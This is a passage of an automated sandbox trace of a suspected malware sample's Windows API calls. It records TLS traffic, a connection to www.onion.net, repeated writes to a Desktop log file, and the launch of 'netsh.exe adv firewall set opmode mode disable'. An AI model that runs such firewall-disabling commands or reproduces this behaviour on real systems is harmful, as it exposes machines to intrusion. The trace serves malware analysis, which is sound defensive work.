lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x13f03a8, nSize=0x104 | out: lpBuffer="篐Ŀ汐ĿĀ") returned 0x0 [0281.837] CoTaskMemFree (pv=0x13f03a8) [0281.837] CoTaskMemAlloc (cb=0x20c) returned 0x13f03a8 [0281.837] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x13f03a8, nSize=0x104 | out: lpBuffer="篐Ŀ汐ĿĀ") returned 0x0 [0281.837] CoTaskMemFree (pv=0x13f03a8) [0281.838] CoTaskMemAlloc (cb=0x20c) returned 0x13f03a8 [0281.838] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x13f03a8, nSize=0x104 | out: lpBuffer="篐Ŀ汐ĿĀ") returned 0x0 [0281.838] CoTaskMemFree (pv=0x13f03a8) [0281.844] EncryptMessage (in: phContext=0x31fcdc8, fQOP=0x0, pMessage=0x3206648, MessageSeqNo=0x0 | out: pMessage=0x3206648) returned 0x0 [0281.851] send (s=0x4dc, buf=0x3205120*, len=138, flags=0) returned 138 [0281.860] setsockopt (s=0x4dc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0282.165] recv (in: s=0x4dc, buf=0x32128e0, len=5, flags=0 | out: buf=0x32128e0*) returned 5 [0282.165] recv (in: s=0x4dc, buf=0x32128e5, len=32, flags=0 | out: buf=0x32128e5*) returned 32 [0282.167] DecryptMessage (in: phContext=0x31fcdc8, pMessage=0x32169a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32169a0, pfQOP=0x0) returned 0x0 [0282.167] recv (in: s=0x4dc, buf=0x32128e0, len=5, flags=0 | out: buf=0x32128e0*) returned 5 [0282.168] recv (in: s=0x4dc, buf=0x32128e5, len=320, flags=0 | out: buf=0x32128e5*) returned 320 [0282.168] DecryptMessage (in: phContext=0x31fcdc8, pMessage=0x3216ad8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3216ad8, pfQOP=0x0) returned 0x0 [0282.204] select (in: nfds=0, readfds=0x321755c, writefds=0x0, exceptfds=0x0, timeout=0x116ed48*(tv_sec=0, tv_usec=0) | out: readfds=0x321755c, writefds=0x0, exceptfds=0x0) returned 0 [0282.205] send (s=0x510, buf=0x31d9aa0*, len=35, flags=0) returned 35 [0282.653] setsockopt (s=0x510, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0282.654] recv (in: s=0x510, buf=0x31d56e8, len=4096, flags=0 | out: buf=0x31d56e8*) returned 4096 [0282.654] setsockopt (s=0x510, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0282.655] recv (in: s=0x510, buf=0x3217b78, len=6556, flags=0 | out: buf=0x3217b78*) returned 6556 [0282.656] WriteFile (in: hFile=0x368, lpBuffer=0x321a448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x116ee34, lpOverlapped=0x0 | out: lpBuffer=0x321a448*, lpNumberOfBytesWritten=0x116ee34*=0x1000, lpOverlapped=0x0) returned 1 [0282.662] WriteFile (in: hFile=0x368, lpBuffer=0x3217c51*, nNumberOfBytesToWrite=0x18c3, lpNumberOfBytesWritten=0x116ee34, lpOverlapped=0x0 | out: lpBuffer=0x3217c51*, lpNumberOfBytesWritten=0x116ee34*=0x18c3, lpOverlapped=0x0) returned 1 [0282.663] CloseHandle (hObject=0x368) returned 1 [0283.072] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x368 [0283.090] GetAddrInfoW (in: pNodeName="www.onion.net", pServiceName=0x0, pHints=0x116ee7c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x116ee24 | out: ppResult=0x116ee24*=0x13f0bb0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.onion.net", ai_addr=0x13e8680*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) returned 0 [0283.282] FreeAddrInfoW (pAddrInfo=0x13f0bb0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="www.onion.net", ai_addr=0x13e8680*(sa_family=2, sin_port=0x0, sin_addr="217.194.236.100"), ai_next=0x0)) [0283.285] WSAConnect (in: s=0x368, name=0x321b7a4*(sa_family=2, sin_port=0x50, sin_addr="217.194.236.100"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0283.318] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e918, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116edcc) returned 1 [0283.319] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x116ee48 | out: lpFileInformation=0x116ee48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0xa696ee9e, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0283.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116edc8) returned 1 [0283.320] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e918, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ee18) returned 1 [0283.320] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x321b950 | out: lpFileInformation=0x321b950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0xa696ee9e, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0283.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ee14) returned 1 [0283.321] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed3c) returned 1 [0283.322] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x63c [0283.323] GetFileType (hFile=0x63c) returned 0x1 [0283.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed38) returned 1 [0283.324] GetFileType (hFile=0x63c) returned 0x1 [0283.324] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x116ed10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x116ed10*=0) returned 0x81 [0283.326] WriteFile (in: hFile=0x63c, lpBuffer=0x321d0b0*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x116edcc, lpOverlapped=0x0 | out: lpBuffer=0x321d0b0*, lpNumberOfBytesWritten=0x116edcc*=0x38, lpOverlapped=0x0) returned 1 [0283.327] CloseHandle (hObject=0x63c) returned 1 [0283.330] WriteFile (in: hFile=0x3d8, lpBuffer=0x31a547c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x116edf8, lpOverlapped=0x0 | out: lpBuffer=0x31a547c*, lpNumberOfBytesWritten=0x116edf8*=0x20, lpOverlapped=0x0) returned 1 [0283.899] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e894, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed48) returned 1 [0283.900] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x116edc4 | out: lpFileInformation=0x116edc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0xad393f52, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0xb9)) returned 1 [0283.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed44) returned 1 [0283.900] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e894, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ed94) returned 1 [0283.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), fInfoLevelId=0x0, lpFileInformation=0x321e2d8 | out: lpFileInformation=0x321e2d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ece0d8a, ftCreationTime.dwHighDateTime=0x1d5ed52, ftLastAccessTime.dwLowDateTime=0x8ece0d8a, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0xad393f52, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0xb9)) returned 1 [0283.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ed90) returned 1 [0283.901] GetFullPathNameW (in: lpFileName="ruby.log", nBufferLength=0x105, lpBuffer=0x116e774, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ruby.log", lpFilePart=0x0) returned 0x20 [0283.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x116ecb8) returned 1 [0283.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ruby.log" (normalized: "c:\\users\\fd1hvy\\desktop\\ruby.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x63c [0283.902] GetFileType (hFile=0x63c) returned 0x1 [0283.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x116ecb4) returned 1 [0283.902] GetFileType (hFile=0x63c) returned 0x1 [0283.902] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x116ec8c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x116ec8c*=0) returned 0xb9 [0283.905] WriteFile (in: hFile=0x63c, lpBuffer=0x321fa08*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x116ed48, lpOverlapped=0x0 | out: lpBuffer=0x321fa08*, lpNumberOfBytesWritten=0x116ed48*=0x2c, lpOverlapped=0x0) returned 1 [0283.905] CloseHandle (hObject=0x63c) returned 1 [0284.191] WriteFile (in: hFile=0x3d8, lpBuffer=0x31a547c*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x116ed74, lpOverlapped=0x0 | out: lpBuffer=0x31a547c*, lpNumberOfBytesWritten=0x116ed74*=0x14, lpOverlapped=0x0) returned 1 [0284.208] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0284.365] CreatePipe (in: hReadPipe=0x116ed44, hWritePipe=0x116ed40, lpPipeAttributes=0x116ecc4, nSize=0x0 | out: hReadPipe=0x116ed44*=0x644, hWritePipe=0x116ed40*=0x648) returned 1 [0284.369] GetCurrentProcess () returned 0xffffffff [0284.369] GetCurrentProcess () returned 0xffffffff [0284.370] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x644, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x116ed48, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x116ed48*=0x64c) returned 1 [0284.370] CloseHandle (hObject=0x644) returned 1 [0284.371] CreatePipe (in: hReadPipe=0x116ed44, hWritePipe=0x116ed40, lpPipeAttributes=0x116ecc4, nSize=0x0 | out: hReadPipe=0x116ed44*=0x644, hWritePipe=0x116ed40*=0x650) returned 1 [0284.372] GetCurrentProcess () returned 0xffffffff [0284.372] GetCurrentProcess () returned 0xffffffff [0284.372] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x644, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x116ed48, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x116ed48*=0x654) returned 1 [0284.372] CloseHandle (hObject=0x644) returned 1 [0284.374] CoTaskMemAlloc (cb=0x20e) returned 0x13f03a8 [0284.375] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x13f03a8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0284.375] CoTaskMemFree (pv=0x13f03a8) [0284.376] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh.exe\" adv firewall set opmode mode disable", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x116ec6c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x648, hStdError=0x650), lpProcessInformation=0x3220d68 | out: lpCommandLine="\"netsh.exe\" adv firewall set opmode mode disable", lpProcessInformation=0x3220d68*(hProcess=0x658, hThread=0x644, dwProcessId=0x9a8, dwThreadId=0xea8)) returned 1 [0284.975] CloseHandle (hObject=0x648) returned 1 [0284.975] CloseHandle (hObject=0x650) returned 1 [0284.978] GetFileType (hFile=0x64c) returned 0x3 [0284.981] GetFileType (hFile=0x654) returned 0x3 [0284.982] CloseHandle (hObject=0x644) returned 1 [0284.983] GetCurrentProcess () returned 0xffffffff [0284.983] GetCurrentProcess () returned 0xffffffff [0284.984] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x658, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x116ee04, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x116ee04*=0x644) returned 1 Thread: id = 178 os_tid = 0x4b0 Thread: id = 180 os_tid = 0x734 Thread: id = 182 os_tid = 0x138c [0224.209] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0224.210] RoInitialize () returned 0x1 [0224.210] RoUninitialize () returned 0x0 Thread: id = 214 os_tid = 0x13b0 Thread: id = 215 os_tid = 0x9e4 Thread: id = 276 os_tid = 0x4f4 Thread: id = 277 os_tid = 0x11f8 Thread: id = 281 os_tid = 0xf9c [0264.143] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0264.144] RoInitialize () returned 0x1 [0264.144] RoUninitialize () returned 0x0 [0264.149] ResetEvent (hEvent=0x36c) returned 1 Thread: id = 291 os_tid = 0x1370 Process: id = "20" image_name = "openwith.exe" filename = "c:\\windows\\system32\\openwith.exe" page_root = "0x225d6000" os_pid = "0x11ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\OpenWith.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 183 os_tid = 0xe78 Thread: id = 184 os_tid = 0x6f8 Thread: id = 185 os_tid = 0x11a0 Thread: id = 186 os_tid = 0x1190 Thread: id = 187 os_tid = 0x133c Thread: id = 188 os_tid = 0x1148 [0223.130] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0223.130] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0223.150] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0223.815] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0223.816] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0223.818] IUnknown_Set (in: ppunk=0x19cb9f25c70*=0x0, punk=0x19cb848ce00 | out: ppunk=0x19cb9f25c70*=0x19cb848ce00) [0223.819] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0224.460] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0224.460] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0224.460] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0225.048] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0225.048] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0225.049] Str_SetPtrW (in: ppsz=0x19cb9f25cb8*=0x0, psz="C:\\Users\\FD1HVy\\Desktop" | out: ppsz=0x19cb9f25cb8*="C:\\Users\\FD1HVy\\Desktop") returned 1 [0225.050] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0225.846] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0225.846] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0225.846] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0226.251] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0226.251] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0226.256] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0227.245] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0227.245] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0227.313] IUnknown_Set (in: ppunk=0x19cb9f25cd0*=0x0, punk=0x19cb848ce78 | out: ppunk=0x19cb9f25cd0*=0x19cb848ce78) [0227.313] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0228.967] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0228.967] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0228.967] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0229.260] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0229.260] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0229.263] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0230.088] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0230.088] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0230.090] CoTaskMemAlloc (cb=0xa) returned 0x19cb8492ff0 [0231.232] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0231.369] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0231.369] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0231.376] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0232.210] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0232.210] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0232.210] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0232.443] TranslateMessage (lpMsg=0x6969a7fda0) returned 0 [0232.443] DispatchMessageW (lpMsg=0x6969a7fda0) returned 0x1 [0232.443] KillTimer (hWnd=0x0, uIDEvent=0x7eed) returned 1 [0232.443] CompareStringOrdinal (lpString1="InvokeDefaultVerbInOtherProcess", cchCount1=-1, lpString2="open", cchCount2=-1, bIgnoreCase=1) returned 1 [0232.443] CoCreateInstance (in: rclsid=0x7ff78262cf20*(Data1=0x94b23d4d, Data2=0x1040, Data3=0x4c4b, Data4=([0]=0x90, [1]=0x81, [2]=0x85, [3]=0xd8, [4]=0xd6, [5]=0xfa, [6]=0x36, [7]=0xc4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff78262d180*(Data1=0xce149b23, Data2=0x5941, Data3=0x4079, Data4=([0]=0x92, [1]=0x23, [2]=0x52, [3]=0xc0, [4]=0xa9, [5]=0x91, [6]=0xec, [7]=0x48)), ppv=0x19cb9f25cf0 | out: ppv=0x19cb9f25cf0*=0x19cba2748f0) returned 0x0 [0235.187] IUnknown_QueryService (in: punk=0x19cb848ce00, guidService=0x7ff78262d410*(Data1=0x9d923edc, Data2=0xb7a9, Data3=0x4f77, Data4=([0]=0x99, [1]=0x33, [2]=0x28, [3]=0x4e, [4]=0x7e, [5]=0x2b, [6]=0x25, [7]=0x36)), riid=0x7ff78262d110*(Data1=0x9d923edc, Data2=0xb7a9, Data3=0x4f77, Data4=([0]=0x99, [1]=0x33, [2]=0x28, [3]=0x4e, [4]=0x7e, [5]=0x2b, [6]=0x25, [7]=0x36)), ppvOut=0x6969a7e768 | out: ppvOut=0x6969a7e768*=0x19cb8498aa8) returned 0x0 [0239.014] GetCurrentProcessId () returned 0x11ac [0239.015] _vsnwprintf (in: _Buffer=0x6969a7e470, _BufferCount=0x103, _Format="Local\\SM0:%d:%d:%hs", _ArgList=0x6969a7e438 | out: _Buffer="Local\\SM0:4524:120:WilError_01") returned 30 [0239.016] CreateMutexExW (lpMutexAttributes=0x0, lpName="Local\\SM0:4524:120:WilError_01", dwFlags=0x0, dwDesiredAccess=0x1f0001) returned 0x2d0 [0239.016] WaitForSingleObjectEx (hHandle=0x2d0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0239.016] OpenSemaphoreW (dwDesiredAccess=0x1f0003, bInheritHandle=0, lpName="Local\\SM0:4524:120:WilError_01_p0") returned 0x2d4 [0239.017] WaitForSingleObject (hHandle=0x2d4, dwMilliseconds=0x0) returned 0x0 [0239.017] ReleaseSemaphore (in: hSemaphore=0x2d4, lReleaseCount=1, lpPreviousCount=0x6969a7e1c0 | out: lpPreviousCount=0x6969a7e1c0) returned 1 [0239.017] ReleaseSemaphore (in: hSemaphore=0x2d4, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 0 [0239.018] GetLastError () returned 0x12a [0239.019] OpenSemaphoreW (dwDesiredAccess=0x1f0003, bInheritHandle=0, lpName="Local\\SM0:4524:120:WilError_01_p0h") returned 0x2d8 [0239.019] WaitForSingleObject (hHandle=0x2d8, dwMilliseconds=0x0) returned 0x0 [0239.019] ReleaseSemaphore (in: hSemaphore=0x2d8, lReleaseCount=1, lpPreviousCount=0x6969a7e1c0 | out: lpPreviousCount=0x6969a7e1c0) returned 1 [0239.019] ReleaseSemaphore (in: hSemaphore=0x2d8, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 0 [0239.019] GetLastError () returned 0x12a [0239.019] CloseHandle (hObject=0x2d8) returned 1 [0239.019] CloseHandle (hObject=0x2d4) returned 1 [0239.020] ReleaseMutex (hMutex=0x2d0) returned 1 [0239.020] CloseHandle (hObject=0x2d0) returned 1 [0239.020] GetCurrentThreadId () returned 0x1148 [0239.020] IUnknown_SetSite (punk=0x19cba2748f0, punkSite=0x19cb9f25c50) returned 0x0 [0239.023] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab05de50*(Data1=0x114, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6969a7e630) [0239.023] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab05de80*(Data1=0x79eac9ed, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6969a7e638) [0239.023] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab05de70*(Data1=0x214e3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6969a7e640) [0239.024] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab05de60*(Data1=0x45d64a29, Data2=0xa63e, Data3=0x4cb6, Data4=([0]=0xb4, [1]=0x98, [2]=0x57, [3]=0x81, [4]=0xd2, [5]=0x98, [6]=0xcb, [7]=0x4f)), ppvObject=0x6969a7e648) [0239.024] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192618*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x6969a7e670) [0245.682] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0245.682] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0246.051] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0246.052] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0246.052] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0246.348] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0246.348] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0246.348] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0247.330] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0247.331] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0247.331] 